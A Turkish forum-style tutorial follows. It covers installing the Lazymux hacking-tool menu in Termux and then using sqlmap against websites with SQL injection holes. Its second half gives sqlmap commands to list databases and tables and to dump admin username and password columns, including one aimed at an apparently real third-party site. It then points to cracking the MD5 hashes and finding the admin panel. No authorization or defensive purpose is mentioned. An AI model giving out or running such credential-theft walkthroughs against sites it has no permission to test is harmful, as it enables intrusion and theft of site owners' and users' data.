- Bugün size bu konuda Termux Lazymux aracının kurulumunu ve işe yaradığını anlatacağım
]Lazymux NedirLazymux linux hack araçlarini içinde bulunduran dilediginizi kurmanizi saglayan program
Programın Barındırdığı Hack Araçları Nelerdir ?
Hack Araçları Şunlardır ;
Hydra
Sqlmap
Nmap
Black-Hydra
Easymap
XSStrike
Striker
ve benzeri bir sürü aracı bünyesinde bulundurur
İçine Farklı Sistemler Kurulabilir Mi?
Evet içine şu sistemleri kurabilirsiniz ;
Kali-Nethunter
Ubuntu
Fedora
BlackArch
ve benzeri diğer sistemleride
Telefon Root Gerektirir Mi ?
Hayır root gerektirmez root olan telefonda bile çalışır
Kurulum
Komut satırına ilk olarak aşağıdaki komutu yazıyoruz
Kod:
apt update
Update işlemi bittikten sonra komut satırına
Kod:
apt upgrade
Bu işlemde bittikten sonra python ' u kurmamız gerekecek.Sebebi ise kullanacagin birçok programin python ve python2 ile çalişmasidir.
Kod:
pkg install python2
Bu komut ile python'u kuruyoruz.
Kod:
pkg install git
Bu komut ile GİT kuruyoruz
Lazymux 'un Kurulumu
Komut satırına ;
Kod:
git clone https://github.com/Gameye98/Lazymux.git
Daha sonra ise komut satırına şu kodları yazıyoruz ;
Kod:
cd
Kod:
ls
Ls yazdiktan sonra karşımıza kurmuş olduğumuz program olan Lazymux 'un klasörü görünecektir.
Dosyayı açmak için ise aşağıda komutları yazıyoruz
Kod:
cd Lazymux
Kod:
ls
Kod:
Ls yazdiktan sonra işte bu dosya senin termux programina istediğin hack programlarini yükleyip hack faaliyetlerini yapmani saglayacak.
Programı açmak için ise aşağıdaki kodu yazıyoruz ;
Kod:
python2 lazymux.py
Ve karşımıza şöyle bir ekran gelicek ;
Burada seçim yapmak için seçeneklerin numarasi kullanilir
Örn;
01 : İnformation gathering
Bizim indirecegimiz program 05 yani web-hacking bölümünde altta bulunan lzmx> 05 yazip enter 'a bssiyoruz
Karşımıza birsürü program çıkıcak bizim kullanacagimiz program sqlmap programi
Sqlmap programi ilk sirada olsudugu için 11 yazip enter 'a basiyoruz
Enter 'a bastiktan sonra size yine (Y/N) sorabilir Y yazip enter 'a basin program baya geniş çapli oldugu için receivering objects bölümünde yüklenmesi biraz uzun sürecektir.
Program yüklendikten sonra
[99] back to menu
[00] exit lazymux
yazisi çıkacak biz 00 yazip enter ' a basiyoruz ve lazymux programindan çikiyoruz
programdan çıktıktan sonra komut satırına ;
Kod:
cd
Kod:
ls
Daha sonra slmap klasörü görünecek
Lazymux . sqlmap
Biz sqlmap klasörüne gireceğiz.Klasöre girmek için komut satırına
Kod:
cd sqlmap
Kod:
ls
yazdiktan sonra yine sqlmap 'a ait doayalar görünecek bize lazim olan dosya ise;
Kod:
sqlmap.py
Şimdi çalistirmadan önce nasil kullanacaginizi anlatiyim
İlk yapacagimiz işlem. şöyle ;
Sql açığı tespit ettiğiniz sitenin database sine girecegi.Bunun için komut satırına şu kodlari yaziyoruz ;
Kod:
python2 sqlmap.py -u "http://www.hedefsite.com/index.php?id=" --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 --dbs
hedef sitenin sql acigi buldugunuz bölümün url sini giriniz örnek ;
Kod:
http://www.site.com/index.php?id=41
yukaridaki komutu girip enter 'a bastiginiz anda sql açıklı websitesini tarayıp database ' sine girecektir.
Tarama bittikten sonra databaseler ekrana gelecektir ;
Kod:
[+]information_schema
Kod:
[+]w3bdb
Databaseden tablolari cekmek icin komut satirina ;
Kod:
python2 sqlmap.py -u "http://www.hedefsite.com/index.php?id=41" --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 databaseismi --tables
Yukaridaki komutu yazdiktan sonra size databasede bulunan tablolari listeleyecektir bu liste çok uzun olabilir ve admin bilgilerini bulmanizi zorlastirabilir
Diyelimki admin user pass olan tabloyu buldunuz
Tablodaki verileri çekmek için ise komut satırına ;
Kod:
python2 sqlmap.py -u "http://cordoganclark.com/newsitem.php?id=8" --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 -D databaseismi -T tabloismi -C username,password --dump
Bu komutu yaziyorsunuz sizde veri isimleri değişik olabilir ben örnek olarak yazdim ekrana şöyle bir çıktı geldi varsayalim ;
-------------------------------------
username . a2dbnsjeia245
password. 243ma2134666
------------------------------------
Böyle bir sonuç çikarsa hash killer ile md5 şifrelenmis bilgileri bulabilirsiniz Admin paneli bulmak için yüklediğimiz lazymux programinda mevcut programlar var onlari kullanabilirsiniz.
Umarım yararli olmuştur.Yazım hatalarim varsa özür dilerim
---------------------
LİKE ATMADAN GEÇMEE
